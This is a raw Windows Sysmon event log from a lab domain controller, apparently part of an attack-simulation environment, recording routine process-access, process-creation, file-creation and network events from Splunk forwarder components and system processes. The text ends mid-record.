14:06:02.189{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202834Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:02.189{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202833Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:02.189{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202832Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:02.189{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E94A-6040-334E-00000000AD01}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202831Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:02.189{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E94A-6040-334E-00000000AD01}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202830Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:02.190{5ABCFE62-E94A-6040-334E-00000000AD01}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002202857Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:03.517{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E94B-6040-354E-00000000AD01}6168C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202856Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:03.517{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202855Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:03.517{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202854Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:03.517{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202853Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:03.517{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202852Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:03.517{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E94B-6040-354E-00000000AD01}6168C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202851Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:03.517{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E94B-6040-354E-00000000AD01}6168C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202850Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:03.518{5ABCFE62-E94B-6040-354E-00000000AD01}6168C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002202849Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:03.423{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5BAE0AE632E86727AFD109240BDD585,SHA256=8258B7D7D6785E7800E64E8D71F82E6271D70513DCE86F286542634A6080D663,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202848Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:03.095{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=32E399291F914D06C064D240B693E63E,SHA256=7519B755AD2C57E154C4FDFE226E4B3B7A6C85D54DA4A7D153D2F52D51018401,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202860Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:04.517{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DF492BCF36B3EA8976A6F7F3B1600FBC,SHA256=7F2ADA734062C8B531BB48F3E3D36B3CC583C91615F32221CE3CA1A41EC795AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202859Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:04.455{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEECB3CA9027F2AB9450C9D6BED33090,SHA256=7DAABE88CCD0240AC51AE0B5DBF7AE7C13B50177E294A1445FDF8EEAEA253985,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202858Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:59.900{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60675-false10.0.1.12-8000- 23542300x80000000000000002202861Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:05.455{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17EB29D5A994CA4BBB0C4FE0678A396A,SHA256=C46CC7C66AC11C8DF7D1B61637A570C2876EA55B9BBDF483C174B00E34379D79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202863Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:06.923{5ABCFE62-84A2-603E-A500-00000000AD01}2876NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=78FFC68B55788172C6F01776E1175A4A,SHA256=7EFF8D2B790A6CE455B9D8C44CE8A2AF78181139506EC2EC15800E71AC1D548F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202862Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:06.470{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4CE2C8DF987A3890FD1A95F11A0BAD8,SHA256=C41D42F158BCC0EABDA0129DA26CA1AA62469A5DEAC581EF98A2A97C6F19246B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202865Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:07.923{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DC01727C5D9422F108C3B724C65D8A0B,SHA256=C0E0DF28140F701B8D3AB284926735766565B6F96E71F2E4493B95AA33BF4D53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202864Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:07.486{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56B256661C28FC44323BC9351120713B,SHA256=978586D8994822721CBCC1C658254277FDEF254C98BD50110173828F1ECC0ED3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202867Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:04.760{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60676-false10.0.1.12-8089- 23542300x80000000000000002202866Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:08.533{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EC2CFE9519A5E3DF04097C6C7FD9401,SHA256=E206DC19DDC406BE1DF1F913C8309A572FEE5DDD641A05CA45B1C7B65D49868D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202869Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:09.533{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4395266837E67CA2090EDE466896B12E,SHA256=79C7EED8A557239AF96BAB36E0C0F18DB23D973FB127756D0D33224C4C8775D8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202868Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:04.916{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60677-false10.0.1.12-8000- 23542300x80000000000000002202871Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:10.705{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=548D41E874245F536D872423B7F82B78,SHA256=D8856BF64F7D489FC974FF3E4D94C08D28EE9413BB66B9A2130FCFAAD0E11229,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202870Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:10.564{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8C75E29143DA1872869C95F47D7E93F,SHA256=ED05BF8451B0E08048A66FB58B5DCEFEC5D12593BE2684C71C163CD0188C2869,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202872Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:11.627{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D1FCB1599F2966469DD30677AD9417A,SHA256=47C36CF71C29B3EB8F01E174E517861CE6E72C2420816BE4777D278C9F1C4240,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202873Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:12.642{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAEA5A6C62C0D51B651170FFA2CD4E8D,SHA256=2059988BCFB5E308929815F38ACA0B7CA116F6AD02EE27193590576E70BA3090,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202876Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:13.642{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E9B8E751E6AA21AC5FAA8C0E6058360,SHA256=5348A74E922C2FC6968C4D1DEC60B14872CE0AA404E3042468B23A6823973132,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202875Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:09.979{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60678-false10.0.1.12-8000- 23542300x80000000000000002202874Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:13.173{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=79820B753AC5C69859BB91F9EEDFED5F,SHA256=F5DD63559AF77DB2E443183D4BE3EDE9DFC5F3E790EF95B9EB9CC0FED4E4BB0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202877Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:14.658{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC7737581476785D9CD99A65D199DCD1,SHA256=22B7A23591302FE70F1161C2218317405D9E830947B9799C724900FCAAB04BED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202878Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:15.877{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDABCE2B21860B12F4C06B65A6DE6441,SHA256=0C3BBB9C5D0B5C126ED46520259BAB5EC465604A6E0764A1D32488AB0706B593,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202879Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:16.923{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2EACFD23BFCEBDAF3ED6AD3AE234D9C,SHA256=A86C64CA1064737D928803BA5E84B74ADDC900A0144D54ED7ED1A9323DDECABA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202888Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:17.595{5ABCFE62-E959-6040-364E-00000000AD01}57763872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202887Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:17.470{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E959-6040-364E-00000000AD01}5776C:\Program 